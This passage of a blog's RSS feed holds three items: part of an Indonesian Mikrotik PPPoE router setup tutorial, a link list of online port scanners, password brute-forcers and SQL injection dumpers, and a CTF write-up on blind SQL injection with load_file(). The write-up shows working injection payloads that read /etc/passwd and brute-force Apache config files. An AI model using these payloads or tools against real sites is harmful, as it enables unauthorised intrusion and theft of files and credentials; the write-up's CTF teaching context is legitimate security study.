<p>2. <strong>Modem ADSL di setting sebagai BRIDGE</strong>, lalu username &amp; password Speedy di input pada Mikrotik(  PPPoE Client ), sehingga setelah terkoneksi ke Speedy maka IP Public berada pada Mikrotik. Pada option ini Mikrotik bukan hanya berfungsi sebagai <strong>BANDWITH MANAJEMEN</strong>namun berbagai fitur lain dapat difungsikan untuk berbagai layanan PUBLIC. Seperti VPN Server / Client, FTP Server, Web Server, dll.</p>
<p>Sebelum memulai konfigurasi, berikut ini <strong>Topologi Jaringan</strong> yang akan kita bangun. Modem ADSL kita setting sebagai Bridge ( Mode Bridge, bukan PPPoe ). IP Address yang digunakan juga  bebas sesuai dengan jaringan di tempat anda. Sekali lagi bahwa jika kita memahami konsep Mikrotik dengan benar maka kita bikin Router untuk koneksi apa saja atau mengunakan IP Address berapa saja akan terasa <strong>mudah </strong>dan <strong>PASTI SUKSES</strong>…</p>
<p>0 : Bahan-bahan yang harus disiapkan untuk membuat <strong>Mikrotik PC Router</strong> adalah sebuah PC Jangkrik – setidaknya <strong>Pentium II/400 Mhz</strong>, harddisk minimal 1 GB, Ram 64 MB / 128 MB, 2 buah PCI LAN Card ( Merk Intel / Realtek / DLink / 3 Com / TPLink / dll ), CDRom, CD Installer Mikrotik, kabel UTP secukupnya serta sebuah Modem ADSL yang support <strong>BRIDGE MODE</strong>.</p>
<p>1 : IP Address <strong>ADSL </strong>Modem : <strong>192.168.1.1</strong></p>
<p>2 : IP Address <strong>interface Mikrotik</strong> ke ADSL Modem : <strong>192.168.1.10 </strong>( harus 1 segmen dengan IP Address Modem ). Walaupun sebenarnya kita bisa saja TIDAK memberi IP Address pada interface ini karena Dial Up PPPoE akan secara otomatis mencari Modem Bridge, tapi pemberian IP Address untuk Interface ini akan memberi kemudahan untuk pengecekan koneksi / ping ke Modem ADSL.</p>
<p>3 : IP Address<strong> interface Mikrotik </strong>ke Switch / Hub / Client : <strong>192.168.88.251 </strong>( kebetulan saja saya gunakan IP ini, yang penting harus 1 Segmen dengan IP Address PC Client kita yang lain ). Perhatikan dan pahami gambar dibawah ini :</p>
<p><a href="http://thinkxfree.files.wordpress.com/2010/04/topologi-mikrotik.jpg"><img title="Topologi-Mikrotik" src="http://thinkxfree.files.wordpress.com/2010/04/topologi-mikrotik.jpg?w=600" alt="" /></a></p>
<p>Setelah pada tahap persiapan dengan memahai <strong>konsep </strong>dan <strong>topologi Jaringan Mikrotik</strong> yang akan kita bangun, maka cara memasaknya adalah sebagai berikut :</p>
<p><strong>Langkah Pertamax</strong> adalah melakukan setting Modem ADSL sebagai <strong>Bridge </strong>:</p>
<p><a href="http://thinkxfree.files.wordpress.com/2010/04/adsl-bridge-tplink-01.jpg"><img title="ADSL-Bridge-TPLink-01" src="http://thinkxfree.files.wordpress.com/2010/04/adsl-bridge-tplink-01.jpg?w=600" alt="" /></a></p>
<p><a href="http://thinkxfree.files.wordpress.com/2010/04/adsl-bridged-dlink-02.jpg"><img title="ADSL-Bridged-Dlink-02" src="http://thinkxfree.files.wordpress.com/2010/04/adsl-bridged-dlink-02.jpg?w=600" alt="" /></a></p>
<p><strong>Kedua :</strong> Siapkan sebuah PC dengan 2 buah LAN Card dan di Install Mikrotik.</p>
<p><a href="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-install.png"><img title="Mikrotik-Install" src="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-install.png?w=600" alt="" /></a></p>
<p><strong>Ketiga : </strong>Setelah Installasi selesai, <strong>Reboot </strong>PC Router kita lalu akses ke Mikrotik dengan<strong>Winbox</strong>. Selanjutnya kedua Interface kita ganti nama menjadi <strong>LAN </strong>dan <strong>SPEEDY</strong>. Tujuannya adalah untuk memudahkan identifikasi kita sehingga tidak terjadi salah setting interface.</p>
<p><a href="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-02-interface.jpg"><img title="Mikrotik-PPPoE-02-interface" src="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-02-interface.jpg?w=600" alt="" /></a></p>
<p><strong>Keempat : </strong>Setting IP Address untuk <strong>LAN </strong>: <strong>192.168.88.251/24</strong> dan IP Addess interface<strong>Speedy </strong>: <strong>192.168.10/24</strong>.</p>
<p><a href="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-03-ip-lan.jpg"><img title="Mikrotik-PPPoE-03-ip-lan" src="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-03-ip-lan.jpg?w=600" alt="" /></a></p>
<p><a href="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-04-ip-speedy.jpg"><img title="Mikrotik-PPPoE-04-ip-speedy" src="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-04-ip-speedy.jpg?w=600" alt="" /></a></p>
<p><strong>Kelima :</strong> Selanjutnya kita setting IP DNS dengan <strong>IP DNS</strong> Speedy : <strong>202.134.1.10</strong> dan<strong>202.134.0.155</strong>. Caranya masuk ke menu “<strong>IP</strong>” lalu pilih “<strong>DNS</strong>“.</p>
<p><a href="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-05-ip-dns.jpg"><img title="Mikrotik-PPPoE-05-ip-dns" src="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-05-ip-dns.jpg?w=600" alt="" /></a></p>
<p><strong>Keenam :</strong> Langkah selanjutnya adalah membuat Interface PPPoE Client. Caranya klik menu Interface, pada simbol plus kita klik dan pilih <strong>“PPPoE Client”</strong>. Disini kita juga memasukkan Username dan Password Speedy yang telah kita punya.</p>
<p><a href="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-06-pppoe-client.jpg"><img title="Mikrotik-PPPoE-06-pppoe-client" src="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-06-pppoe-client.jpg?w=600" alt="" /></a></p>
<p>Pada Option “<strong>General</strong>“, cukup menentukan interface yang 1 jalur dengan Modem ADSL. Untuk nama dan type-nya pake default-nya saja sudah cukup.</p>
<p><a href="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-07-pppoe-client.jpg"><img title="Mikrotik-PPPoE-07-pppoe-client" src="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-07-pppoe-client.jpg?w=600" alt="" /></a></p>
<p>Jangan lupa untuk menentukan <strong>Interface </strong>yang mengarah <strong>ke modem ADSL</strong>, yaitu interface yang telah kita beri nama “<strong>SPEEDY</strong>“. Lalu selanjutnya klik tab <strong>“Dial Out”</strong> dan masukkan<strong>Username + Password</strong> Account<strong> Speedy</strong> kita.</p>
<p><a href="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-08.jpg"><img title="Mikrotik-PPPoE-08" src="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-08.jpg?w=600" alt="" /></a></p>
<p>Selain melalui <strong>Winbox</strong>, kita juga bisa memasukkan Username dan Password Speedy ini lewat<strong>WebBox</strong>.</p>
<p><a href="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-08webbox.jpg"><img title="Mikrotik-PPPoE-08webbox" src="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-08webbox.jpg?w=600" alt="" /></a></p>
<p><strong>Ketujuh : </strong>Apabila kita telah selesai melakukan setting <strong>PPPoE Client</strong> maka begitu selesai setting Mikrotik langsung melakukan <strong>DialUp </strong>ke Modem ADSL kita. Jika setting Username dan Password ini benar maka selanjutnya akan tampak status koneksi Mikrotik kita dan pada menu IP -&gt; Address akan muncul sebuat IP Address baru berupa<strong> IP Public</strong> (<strong>125.164.75.150</strong> ) yang diberikan Telkom Speedy kepada pelanggan berdasarkan Username &amp; Password yang kita miliki.</p>
<p><a href="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-09-pppoe-connected.jpg"><img title="Mikrotik-PPPoE-09-pppoe-connected" src="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-09-pppoe-connected.jpg?w=600" alt="" /></a></p>
<p><strong>Kedelapan :</strong> Selanjutnya kita atur <strong>NAT </strong>( <strong>Network Address Translation</strong> ) agar Client dapat terkoneksi ke Internet atau dapat mengakses internet. Caranya masuk ke menu <strong>-&gt; IP -&gt; Firewall -&gt; NAT</strong> ( seperti gambar dibawah ini ).</p>
<p><a href="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-10-nat.jpg"><img title="Mikrotik-PPPoE-10-nat" src="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-10-nat.jpg?w=600" alt="" /></a></p>
<p><strong>Kesembilan :</strong> Kita buat 1 buah <strong>NAT Rule</strong>, pada <strong>“General” </strong>-&gt; <strong>Chain = srcnat</strong>, -&gt;<strong>OutInterface </strong>= <strong>pppoe out1</strong>. Lalu pada option <strong>“Action”</strong> kita pilih -&gt; <strong>Masquarade</strong>.</p>
<p><a href="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-11-nat.jpg"><img title="Mikrotik-PPPoE-11-Nat" src="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-11-nat.jpg?w=600" alt="" /></a></p>
<p><a href="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-12.jpg"><img title="Mikrotik-PPPoE-12" src="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-12.jpg?w=600" alt="" /></a></p>
<p>Selain setting dari <strong>Console </strong>atau dari <strong>Winbox</strong>, kita juga bisa melakukan setting <strong>NAT </strong>ini dari<strong>WebBox </strong>( kalo menurut saya sich ini buat Newbie Mikrotik lebih mudah daripada setting dari<strong>Winbox </strong>). Caranya : Pilih Public Interface = <strong>pppoe out1</strong> lalu centang <strong>NAT </strong>trus klik “<strong>Apply</strong>“.</p>
<p><a href="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-12webbox.jpg"><img title="Mikrotik-PPPoE-12webbox" src="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-12webbox.jpg?w=600" alt="" /></a></p>
<p><strong>Kesepuluh : </strong>Selanjutnya kita tambahkan 1 buah <strong>IP Route</strong>. Perhatikan pada sebelah IP Address dari IP Public dibawah ini yaitu : <strong>Network = 125.164.72.1</strong>. Nah, IP Network ini adalah <strong>IP Gateway Telkom Speedy</strong> yang melayani koneksi kita. Tambahkan <strong>1 buah New Route</strong>,<strong> </strong>Destination <strong>: 0.0.0.0/0</strong> lalu Gateway = <strong>= 125.164.72.1.</strong><strong></strong></p>
<p><a href="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-13a.jpg"><img title="Mikrotik-PPPoE-13a" src="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-13a.jpg?w=600" alt="" /></a></p>
<p><strong>Kesebelas :</strong> Sampai sini setting Mikrotik Router kita telah selesai. Tinggal test ping koneksi dari Mikrotik kita. Lakukan test ke IP DNS Speedy : 202.134.1.0 dilanjutkan test ping ke yahoo.com maupun ke websites yang lain. Jika ada reply maka Mikrotik kita telah berhasil / telah sukses kita konfigurasi.</p>
<p><a href="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-13b.jpg"><img title="Mikrotik-PPPoE-13b" src="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-13b.jpg?w=600" alt="" /></a></p>
<p><strong>Keduabelas : </strong>Langkah ini kita lakukan pada PC Client. IP Mikrotik interface ke LAN merupakan IP Gateway untuk PC Client kita. IP DNS pada Client dapat kita masukkan IP DNS Speedy secara langsung maupun <strong>IP DNS</strong> dari Mikrotik ( karena kita telah setting Mikrotik menjadi DNS Relay pada langkah kelima dari tutorial ini ).</p>
<p><a href="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-14.jpg"><img title="Mikrotik-PPPoE-14" src="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-14.jpg?w=600" alt="" /></a></p>
<p>~~~~~~~~~~~~~~~~~~</p>
<p>Okey, sampai sini <strong>Mikrotik </strong>kita telah berfungsi sebagai <strong>Router </strong>dan sharing akses internet untuk semua Client yang lain telah dapat difungsikan. Nah, tahap selanjutnya yang harus kita lakukan adalah <strong>Bandwith Manajemen</strong> atau mengatur bandwith yang tepat untuk semua Client sehingga jika ada Client yang melakukan download mengunakan software Downloader dapat di kendalikan atau di kontrol sehingga bandwith kita tidak dihabiskannya sendiri dan akses internet client yang lain tidak menjadi lemot.</p>
<p><a href="http://thinkxfree.wordpress.com/2010/04/16/step-by-step-installasi-router-mikrotik-dgn-adsl-speedy/">http://thinkxfree.wordpress.com/2010/04/16/step-by-step-installasi-router-mikrotik-dgn-adsl-speedy/</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/andiwijaya.wordpress.com/183/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/andiwijaya.wordpress.com/183/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/andiwijaya.wordpress.com/183/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/andiwijaya.wordpress.com/183/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/andiwijaya.wordpress.com/183/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/andiwijaya.wordpress.com/183/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/andiwijaya.wordpress.com/183/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/andiwijaya.wordpress.com/183/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/andiwijaya.wordpress.com/183/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/andiwijaya.wordpress.com/183/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/andiwijaya.wordpress.com/183/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/andiwijaya.wordpress.com/183/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/andiwijaya.wordpress.com/183/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/andiwijaya.wordpress.com/183/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=andiwijaya.wordpress.com&amp;blog=836339&amp;post=183&amp;subd=andiwijaya&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://andiwijaya.wordpress.com/2011/12/23/step-by-step-installasi-router-mikrotik-dgn-adsl-speedy/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0a4646472c465eeb00190a40d7a185ae?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">Andi</media:title>
		</media:content>

		<media:content url="http://thinkxfree.files.wordpress.com/2010/04/topologi-mikrotik.jpg?w=600" medium="image">
			<media:title type="html">Topologi-Mikrotik</media:title>
		</media:content>

		<media:content url="http://thinkxfree.files.wordpress.com/2010/04/adsl-bridge-tplink-01.jpg?w=600" medium="image">
			<media:title type="html">ADSL-Bridge-TPLink-01</media:title>
		</media:content>

		<media:content url="http://thinkxfree.files.wordpress.com/2010/04/adsl-bridged-dlink-02.jpg?w=600" medium="image">
			<media:title type="html">ADSL-Bridged-Dlink-02</media:title>
		</media:content>

		<media:content url="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-install.png?w=600" medium="image">
			<media:title type="html">Mikrotik-Install</media:title>
		</media:content>

		<media:content url="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-02-interface.jpg?w=600" medium="image">
			<media:title type="html">Mikrotik-PPPoE-02-interface</media:title>
		</media:content>

		<media:content url="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-03-ip-lan.jpg?w=600" medium="image">
			<media:title type="html">Mikrotik-PPPoE-03-ip-lan</media:title>
		</media:content>

		<media:content url="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-04-ip-speedy.jpg?w=600" medium="image">
			<media:title type="html">Mikrotik-PPPoE-04-ip-speedy</media:title>
		</media:content>

		<media:content url="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-05-ip-dns.jpg?w=600" medium="image">
			<media:title type="html">Mikrotik-PPPoE-05-ip-dns</media:title>
		</media:content>

		<media:content url="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-06-pppoe-client.jpg?w=600" medium="image">
			<media:title type="html">Mikrotik-PPPoE-06-pppoe-client</media:title>
		</media:content>

		<media:content url="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-07-pppoe-client.jpg?w=600" medium="image">
			<media:title type="html">Mikrotik-PPPoE-07-pppoe-client</media:title>
		</media:content>

		<media:content url="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-08.jpg?w=600" medium="image">
			<media:title type="html">Mikrotik-PPPoE-08</media:title>
		</media:content>

		<media:content url="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-08webbox.jpg?w=600" medium="image">
			<media:title type="html">Mikrotik-PPPoE-08webbox</media:title>
		</media:content>

		<media:content url="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-09-pppoe-connected.jpg?w=600" medium="image">
			<media:title type="html">Mikrotik-PPPoE-09-pppoe-connected</media:title>
		</media:content>

		<media:content url="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-10-nat.jpg?w=600" medium="image">
			<media:title type="html">Mikrotik-PPPoE-10-nat</media:title>
		</media:content>

		<media:content url="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-11-nat.jpg?w=600" medium="image">
			<media:title type="html">Mikrotik-PPPoE-11-Nat</media:title>
		</media:content>

		<media:content url="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-12.jpg?w=600" medium="image">
			<media:title type="html">Mikrotik-PPPoE-12</media:title>
		</media:content>

		<media:content url="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-12webbox.jpg?w=600" medium="image">
			<media:title type="html">Mikrotik-PPPoE-12webbox</media:title>
		</media:content>

		<media:content url="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-13a.jpg?w=600" medium="image">
			<media:title type="html">Mikrotik-PPPoE-13a</media:title>
		</media:content>

		<media:content url="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-13b.jpg?w=600" medium="image">
			<media:title type="html">Mikrotik-PPPoE-13b</media:title>
		</media:content>

		<media:content url="http://thinkxfree.files.wordpress.com/2010/04/mikrotik-pppoe-14.jpg?w=600" medium="image">
			<media:title type="html">Mikrotik-PPPoE-14</media:title>
		</media:content>
	</item>
		<item>
		<title>Online Scan</title>
		<link>http://andiwijaya.wordpress.com/2011/11/12/online-scan/</link>
		<comments>http://andiwijaya.wordpress.com/2011/11/12/online-scan/#comments</comments>
		<pubDate>Fri, 11 Nov 2011 19:04:33 +0000</pubDate>
		<dc:creator>Andi Wijaya</dc:creator>
				<category><![CDATA[hacking]]></category>

		<guid isPermaLink="false">http://andiwijaya.wordpress.com/?p=181</guid>
		<description><![CDATA[Online Port Scanner http://scan.subhashdasyam.com/port-scanner.php Online VNC Scanner http://scan.subhashdasyam.com/dumper-with-login.php Online SSH Scanner http://scan.subhashdasyam.com/ssh-scanner.php &#160; Online Admin Page Bruter http://scan.subhashdasyam.com/admin-page-finder.php Online WordPress Admin/Password Bruter http://scan.subhashdasyam.com/wordpress-bruter.php Online LFI Scanner http://scan.subhashdasyam.com/lfi-scanner.php Online RDP Scanner http://scan.subhashdasyam.com/remote-desktop-scanner.php Fastest Online SQL Injection Values Dumper http://scan.subhashdasyam.com/dumper.php Fastest Online SQL Injection Values Dumper(Supports Login) http://scan.subhashdasyam.com/dumper-with-login.php<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=andiwijaya.wordpress.com&amp;blog=836339&amp;post=181&amp;subd=andiwijaya&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><strong>Online Port Scanner</strong></p>
<blockquote><p><a href="http://www.coresec.org/2011/10/08/online-penetration-testing-tools/Online%20Port%20Scanner%20%20http://scan.subhashdasyam.com/port-scanner.php%20%20%20%20Online%20VNC%20Scanner%20%20http://scan.subhashd...vnc-scanner.php%20%20%20Online%20SSH%20Scanner%20%20http://scan.subhashdasyam.com/ssh-scanner.php%20%20%20%20Online%20Admin%20Page%20Bruter%20%20http://scan.subhashdasyam.com/admin-page-finder.php%20%20%20%20%20%20Online%20WordPress%20Admin/Password%20Bruter%20%20http://scan.subhashdasyam.com/wordpress-bruter.php%20%20%20%20Online%20LFI%20Scanner%20%20http://scan.subhashdasyam.com/lfi-scanner.php%20%20%20%20Online%20RDP%20Scanner%20%20http://scan.subhashdasyam.com/remote-desktop-scanner.php%20%20%20%20Fastest%20Online%20SQL%20Injection%20Values%20Dumper%20%20http://scan.subhashdasyam.com/dumper.php%20%20%20%20%20Fastest%20Online%20SQL%20Injection%20Values%20Dumper(Supports%20Login)%20%20http://scan.subhashdasyam.com/dumper-with-login.php" target="_blank">http://scan.subhashdasyam.com/port-scanner.php</a></p></blockquote>
<p><strong>Online VNC Scanner</strong></p>
<blockquote><p><a title="External link" href="http://scan.subhashdasyam.com/vnc-scanner.php" rel="nofollow external">http://scan.subhashdasyam.com/dumper-with-login.php</a></p></blockquote>
<p><strong>Online SSH Scanner</strong></p>
<blockquote>
<pre><a href="http://scan.subhashdasyam.com/ssh-scanner.php" target="_blank">http://scan.subhashdasyam.com/ssh-scanner.php</a></pre>
</blockquote>
<p>&nbsp;</p>
<p><strong>Online Admin Page Bruter</strong></p>
<blockquote>
<pre><a href="http://scan.subhashdasyam.com/admin-page-finder.php" target="_blank">http://scan.subhashdasyam.com/admin-page-finder.php</a></pre>
</blockquote>
<p><strong>Online WordPress Admin/Password Bruter</strong></p>
<blockquote>
<pre><a href="http://scan.subhashdasyam.com/wordpress-bruter.php" target="_blank">http://scan.subhashdasyam.com/wordpress-bruter.php</a></pre>
</blockquote>
<p><strong>Online LFI Scanner</strong></p>
<blockquote>
<pre><a href="http://scan.subhashdasyam.com/lfi-scanner.php" target="_blank">http://scan.subhashdasyam.com/lfi-scanner.php</a></pre>
</blockquote>
<p><strong>Online RDP Scanner</strong></p>
<blockquote>
<pre><a href="http://scan.subhashdasyam.com/remote-desktop-scanner.php" target="_blank">http://scan.subhashdasyam.com/remote-desktop-scanner.php</a></pre>
</blockquote>
<p><strong>Fastest Online SQL Injection Values Dumper</strong></p>
<blockquote>
<pre><a href="http://scan.subhashdasyam.com/dumper.php" target="_blank">http://scan.subhashdasyam.com/dumper.php</a></pre>
</blockquote>
<p><strong>Fastest Online SQL Injection Values Dumper(Supports Login)</strong></p>
<blockquote>
<pre><a href="http://scan.subhashdasyam.com/dumper-with-login.php" target="_blank">http://scan.subhashdasyam.com/dumper-with-login.php</a></pre>
</blockquote>
<div></div>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/andiwijaya.wordpress.com/181/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/andiwijaya.wordpress.com/181/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/andiwijaya.wordpress.com/181/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/andiwijaya.wordpress.com/181/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/andiwijaya.wordpress.com/181/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/andiwijaya.wordpress.com/181/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/andiwijaya.wordpress.com/181/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/andiwijaya.wordpress.com/181/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/andiwijaya.wordpress.com/181/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/andiwijaya.wordpress.com/181/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/andiwijaya.wordpress.com/181/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/andiwijaya.wordpress.com/181/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/andiwijaya.wordpress.com/181/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/andiwijaya.wordpress.com/181/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=andiwijaya.wordpress.com&amp;blog=836339&amp;post=181&amp;subd=andiwijaya&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://andiwijaya.wordpress.com/2011/11/12/online-scan/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0a4646472c465eeb00190a40d7a185ae?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">Andi</media:title>
		</media:content>
	</item>
		<item>
		<title>Blind SQL injection with load_file()</title>
		<link>http://andiwijaya.wordpress.com/2011/09/15/blind-sql-injection-with-load_file/</link>
		<comments>http://andiwijaya.wordpress.com/2011/09/15/blind-sql-injection-with-load_file/#comments</comments>
		<pubDate>Thu, 15 Sep 2011 07:08:24 +0000</pubDate>
		<dc:creator>Andi Wijaya</dc:creator>
				<category><![CDATA[SQL Injection]]></category>

		<guid isPermaLink="false">http://andiwijaya.wordpress.com/?p=173</guid>
		<description><![CDATA[Currently I am working a lot on RIPS but here is a small blogpost about a technique I thought about lately and wanted to share. While participating at the smpCTF I came across a blind SQL injection in level 2. After solving the challenge I checked for the FILE privilege: /level2/?id=1/**/and/**/(SELECT/**/is_grantable/**/FROM/**/information_schema.user_privileges/**/WHERE/**/privilege_type=0x66696C65/**/AND/**/grantee/**/like/**/0x25726F6F7425/**/limit/**/1)=0&#215;59 Luckily the FILE privilege [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=andiwijaya.wordpress.com&amp;blog=836339&amp;post=173&amp;subd=andiwijaya&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Currently I am working a lot on RIPS but here is a small blogpost about a technique I thought about lately and wanted to share.<br />
While participating at the smpCTF I came across a blind SQL injection in level 2. After solving the challenge I checked for the FILE privilege:</p>
<p>/level2/?id=1/**/and/**/(SELECT/**/is_grantable/**/FROM/**/information_schema.user_privileges/**/WHERE/**/privilege_type=0x66696C65/**/AND/**/grantee/**/like/**/0x25726F6F7425/**/limit/**/1)=0&#215;59</p>
<p>Luckily the FILE privilege was granted which was not intended by the organizer. Since I had not solved level 1 at that time I thought it would be easier to read the PHP files to solve level 1. First I checked if reading files with <a href="https://websec.wordpress.com/2010/10/01/blind-sql-injection-with-load_file/">load_file()</a> worked at all and tried to read <em>/etc/passwd</em>:</p>
<div id="highlighter_410073">
<div>/level2/?id=1/**/and/**/!isnull(load_file(2F6574632F706173737764))</div>
<div>Since the webpage with <em>id=1</em> was displayed the <em>and</em> condition must have been evaluated to <em>true</em> which means that the file could be read (<em>load_file()</em> returns <em>null</em> if the file can not be read). Before reading the PHP files I needed to find the webserver configuration file to find out where the <em>DocumentRoot</em> was configured. I used the same query as above to check for the existence of the following apache config files:</div>
</div>
<div>$paths = array(<br />
&#8220;/etc/passwd&#8221;,<br />
&#8220;/etc/init.d/apache/httpd.conf&#8221;,<br />
&#8220;/etc/init.d/apache2/httpd.conf&#8221;,<br />
&#8220;/etc/httpd/httpd.conf&#8221;,<br />
&#8220;/etc/httpd/conf/httpd.conf&#8221;,<br />
&#8220;/etc/apache/apache.conf&#8221;,<br />
&#8220;/etc/apache/httpd.conf&#8221;,<br />
&#8220;/etc/apache2/apache2.conf&#8221;,<br />
&#8220;/etc/apache2/httpd.conf&#8221;,<br />
&#8220;/usr/local/apache2/conf/httpd.conf&#8221;,<br />
&#8220;/usr/local/apache/conf/httpd.conf&#8221;,<br />
&#8220;/opt/apache/conf/httpd.conf&#8221;,<br />
&#8220;/home/apache/httpd.conf&#8221;,<br />
&#8220;/home/apache/conf/httpd.conf&#8221;,<br />
&#8220;/etc/apache2/sites-available/default&#8221;,<br />
&#8220;/etc/apache2/vhosts.d/default_vhost.include&#8221;);<strong></strong></div>
<div><strong>update:</strong> There is an <a href="http://wiki.apache.org/httpd/DistrosDefaultLayout">official list</a> for Apache. Very useful.</div>
<p>Webpage with <em>id=1</em> was displayed for the file <em>/etc/httpd/httpd.conf</em> thus revealing that this file existed and could be read.</p>
<p>Now it was time for the tricky part: I had only a true/false blind SQL injection which means that I could only bruteforce the configuration file char by char. Since the length of the file was more than 10000 chars this would have taken way too long.<br />
I decided to give little shots at the configuration file trying to hit the <em>DocumentRoot</em> setting or a comment nearby that identifies my current position. Each shot bruteforced 10 alphanumerical characters:</p>
<p>/level2/?id=1/**/and/**/mid(lower(load_file(0x2F6574632F68747470642F68747470642E636F6E66)),$k,1)=0x$char</p>
<p>I compared the few bruteforced characters to a known apache configuration file trying to map the characters to a common configuration comment. This worked for most of the character sequences but unfortunately almost every configuration file is a bit different so that it was not possible to calculate the correct offset of the <em>DocumentRoot</em> setting once another setting had been identified. I bruteforced only alphanumerical strings to save time. For example the bruteforced string “dulesthoselisted” could be mapped to the comment “modules (those listed by `httpd -l’)” and so on.<br />
After the 10th shot I luckily hit the <em>DocumentRoot</em> setting comment at offset 7467 and after this it was possible to calculate the correct offset for the beginning of the <em>DocumentRoot</em> setting and I could retrieve “srvhttpdhtdocs” (DocumentRoot: /srv/httpd/htdocs/).</p>
<p>While that worked fine during the hectics of the CTF and was better than a bruteforce on the whole configuration file, I thought about it again yesterday and thought that this technique was plain stupid <img src="https://s-ssl.wordpress.com/wp-includes/images/smilies/icon_wink.gif" alt=";)" /> .</p>
